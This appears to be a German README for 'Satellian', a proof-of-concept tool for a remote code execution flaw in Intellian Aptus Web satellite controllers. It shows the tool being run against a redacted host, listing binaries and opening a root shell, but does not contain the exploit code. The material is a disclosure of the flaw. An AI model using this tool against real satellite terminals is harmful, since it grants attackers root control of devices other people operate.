
PoC-Skript, das eine RCE-Sicherheitslücke im Intellian-Satelliten-Controller aufzeigt
Satellian ist ein PoC-Skript, das eine RCE-Schwachstelle im Intellian-Satellitencontroller (Intellian Aptus Web) aufzeigt.
Das folgende Skript versucht, alle Binärdateien im System aufzulisten, und erlaubt dem Tester danach, direkt mit dem Server zu interagieren (normalerweise als root).
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
Intellian v1.12, v1.21, v1.24.
Alle Informationen in diesem Repository dienen ausschließlich zu Bildungszwecken. Der Autor des Repositorys ist in keiner Weise für Missbrauch der Informationen verantwortlich. Dieses Skript ist lediglich ein Proof-of-Concept und wurde keinesfalls für böswillige Aktivitäten entwickelt.